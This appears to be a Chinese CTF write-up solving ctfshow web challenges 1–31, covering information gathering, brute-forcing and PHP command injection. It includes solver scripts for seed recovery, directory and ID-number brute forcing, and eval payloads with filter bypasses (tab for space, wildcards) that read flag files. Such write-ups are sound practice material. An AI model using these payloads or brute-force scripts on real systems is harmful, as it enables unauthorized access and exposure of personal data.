信息搜集
web1[html]
查看源码
ctfshow{874c4342-435b-40e6-96a7-b37ddf723161}
web2[html]
无法右键,直接Ctrl
+U
或者地址栏开头加上view-source:
。
ctfshow{a3bc8e02-09ce-4cc2-a429-72bd55d9b3f0}
web3[header]
分析流量
ctfshow{823de946-8869-473e-8a99-82ca91f4085b}
web4[robots.txt
]
查看robots.txt
建议加个收藏夹js,方便快速打开:
javascript:window.location = document.location.protocol + "//" + document.location.host + "/robots.txt";
ctfshow{12de0686-8909-4772-a2b6-b05c55b74215}
web5[.phps
]
访问./index.phps
ctfshow{07083375-5d54-4ca9-8fcf-001f8c8cba32}
web6[www.zip
]
访问./www.zip
发现存在fl000g.txt
,访问./fl000g.txt
ctfshow{1034d16a-721d-4805-83a7-0446a9aa0e5c}
web7[.git/
]
访问./.git/
ctfshow{63f0f59c-697d-48de-bd60-d9da6f49c7d5}
web8[.svn/
]
访问./.svn/
ctfshow{daf35dcb-81bf-43a0-8d79-797f16e84555}
web9[.swp
]
访问./index.php.swp
ctfshow{d3d4c281-86c4-464b-a2ae-6fa6d01b2907}
web10[cookie]
查看cookie
,我这用的是Web Developer
ctfshow{afbdb2ad-1b92-4f2b-ac21-b3c3358a7500}
web11[域名txt解析]
nslookup -qt=TXT ctfshow.com
flag{just_seesee}
web12[社工]
访问./admin/
,发现需要登录,猜测用户名为admin
,密码为首页页尾的372619038
ctfshow{e5c0e24d-f03d-4df9-b4db-3b3f3734fc53}
web13[建站模板]
发现页尾存在文档
按文档指引访问./system1103/login.php
,用admin/admin1103
登录
ctfshow{463d8523-8432-4297-b738-27d9fb837068}
web14[KindEditor 4.1.11]
漏洞前提:配置的文件空间目录不存在
访问./editor/
,点击插入文件,选择文件空间,在/var/www/html/nothinghere/fl000g.txt
找到flag
于是访问./nothinghere/fl000g.txt
ctfshow{04cc465c-cbf8-4244-824a-284c038f66f5}
web15[社工]
访问./admin/
,发现可以忘记密码
根据首页底部的qq邮箱查找qq发现资料显示陕西 西安 新城区
于是一个一个试过去,使用西安
成功重置密码为admin7789
,登录
ctfshow{f2779cd5-a648-4ac4-bd00-4f38437d7aad}
web16[php探针]
访问./tz.php
发现存在探针
找到phpinfo
选项
ctfshow{5462980d-256a-470a-a818-b9e19ab09fc6}
web17[域名历史解析]
随便找个能查IP History
的网站,我用的是https://viewdns.info/iphistory/
排除掉上一任的解析,以及服务商的国外解析,剩下的第一个IP即为一般情况下的真实IP
flag{111.231.70.44}
web18[js]
看一下js,发现分数判定
控制台跑一下得到线索110.php
ctfshow{326d5b86-f2f6-4b58-a63f-5c4017a1dcfe}
web19[源码注释]
查看html,发现注释未删,可知账号admin
,密码的话咋看都是加密过的
往上看post的代码,发现是aes-cbc
加密,密钥和偏移都给了,解就完事
拿解出来的密码登录
ctfshow{ae62164b-4665-4385-99c3-2637a245f6c6}
web20[.mdb]
访问./db/db.mdb
发现文件
flag{ctfshow_old_database}
爆破
web21[Base Auth]
burp
爆就完事,不过要注意burp的过滤并不会自动刷新结果,需要手动再过滤一下
ctfshow{67950f5e-5f73-4ed1-a3b4-3f6b176784fd}
web22[子域名]
这题裂了,以后再说
web23[php基础]
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 11:43:51
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include('flag.php');
if(isset($_GET['token'])){
$token = md5($_GET['token']);
if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
echo $flag;
}
}
}else{
highlight_file(__FILE__);
}
?>
写个脚本爆破就完事
<?php
function fuck() {
foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $i){
foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $j){
$Gtoken = $i.$j;
$token = md5($Gtoken);
if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
return $Gtoken;
}
}
}
}
return "";
}
echo fuck();
// ZE
ctfshow{f16c4894-48b4-41dd-bf26-e6c3a45a8af8}
web24[mt_srand
]
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:26:39
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 13:53:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
$r = $_GET['r'];
mt_srand(372619038);
if(intval($r)===intval(mt_rand())){
echo $flag;
}
}else{
highlight_file(__FILE__);
echo system('cat /proc/version');
}
?> Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021
php的随机数是根据种子数生成的,所以知道种子数相当于知道了后续所有随机数序列。
<?php
mt_srand(372619038);
echo mt_rand();
//1155388967
web25[mt_srand
]
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:56:57
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
$r = $_GET['r'];
mt_srand(hexdec(substr(md5($flag), 0,8)));
$rand = intval($r)-intval(mt_rand());
if((!$rand)){
if($_COOKIE['token']==(mt_rand()+mt_rand())){
echo $flag;
}
}else{
echo $rand;
}
}else{
highlight_file(__FILE__);
echo system('cat /proc/version');
}
Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021
先./?r=0
得到第一次mt_rand
的负值748251799
然后用php_mt_seed`爆破种子数吧
得到六个对应不同系统环境的种子数,因为上一题我是在php7
环境算的,没问题,所有就拿php7
去验算一遍。
<?php
function fuck($i){
mt_srand($i);
$f = mt_rand();
if ($f == 748251799){
return mt_rand()+mt_rand();
}
}
echo fuck(1448670724)."n";
echo fuck(1448670725)."n";
echo fuck(575534922)."n";
echo fuck(608125702)."n";
echo fuck(2575729271)."n";
echo fuck(2656555094)."n";
//3356577139
//1337536129
然后设一下cookie访问./?r=748251799
,在token=3356577139
的时候得到flag
ctfshow{38496b53-16d2-40de-b529-af298b6c4b4a}
web26[抓包]
这题很奇怪,直接抓包就能出
ctfshow{a0bd74a4-1739-4053-bb15-0a35f5bef6b7}
web27[账号收集]
打开发现是个教务系统,首先想着能不能利用下面公开的学生信息直接搞到账号密码
然后试着用身份证的验算位去爆破合法身份证
def checkIDNumber(num_str):
str_to_int = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5,
'6': 6, '7': 7, '8': 8, '9': 9, 'X': 10}
check_dict = {0: '1', 1: '0', 2: 'X', 3: '9', 4: '8', 5: '7',
6: '6', 7: '5', 8: '4', 9: '3', 10: '2'}
assert len(num_str) == 18
check_num = 0
for index, num in enumerate(num_str):
if index == 17:
right_code = check_dict.get(check_num % 11)
if num == right_code:
return True
else:
return False
check_num += str_to_int.get(num) * (2 ** (17 - index) % 11)
import requests
if __name__ == '__main__':
for year in range(1990, 2000):
for month in range(1, 13):
for day in range(1, 32):
# print(str(year) + ("0" + str(month))[-2:] + ("0" + str(day))[-2:])
num_str = '621022' + str(year) + ("0" + str(month))[-2:] + ("0" + str(day))[-2:] + '5237'
if checkIDNumber(num_str):
data = {
'a':'高先伊',
'p':num_str,
}
r = requests.post("http://9b942f9a-035b-41a3-9a76-2519aec7e97e.chall.ctf.show:8080/info/checkdb.php", data= data).json()
if(r['0'] != "error"):
print(num_str)
print(num_str)
ctfshow{02c2feb9-db89-44c6-9e81-eec7c6e50d77}
web28[目录爆破]
这题其实刚开始比较懵逼,因为知道是爆破文件位置但是这无异于大海捞针,当时做的时候没有hint,爆了三四种路径格式才成功。现在直接照着hint给的格式爆就完事
from requests import get
def fuck():
for i in range(0, 100):
for j in range(0, 100):
print(i, j)
if get(f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/", allow_redirects=False).status_code != 403:
return f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/"
if __name__ == '__main__':
print(fuck())
# http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/72/20/
ctfshow{60b39b18-e70c-4cd0-a5e4-7deb336af1f6}
命令执行
web29
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法很多,这里给两种操作。(由于浏览器的html解析逻辑,会把php当成注释处理,所以一定要记得看html以保证看到的是真的返回)
// payload
列文件
/?c=echo%20`ls`;
/?c=eval($_GET['d']);&d=echo `ls`;
读文件
/?c=echo `cat fla*`;
/?c=echo `cat fla?.php`;
/?c=eval($_GET['d']);&d=echo `cat flag.php`;
ctfshow{1d5d8d07-8623-4437-80f2-5a2454b9f36d}
web30
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
这题payload可以直接用上一题的,因为咱们用`
替代了system
,至于php
这个文件名的屏蔽,上面payload有两句都是不包含php
的。
ctfshow{bb6d3fc9-9491-46bd-884b-1c7a4fd2c15f}
web31
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
这题把空格
和单引号'
给过滤了,所以上面的payload都不顶了,不过问题不大,制表符%09
可以代替空格。
// payload
列文件
/?c=echo%09`ls`;
读文件
/?c=echo%09`/bin/ca*%09fla*`;
Comments | NOTHING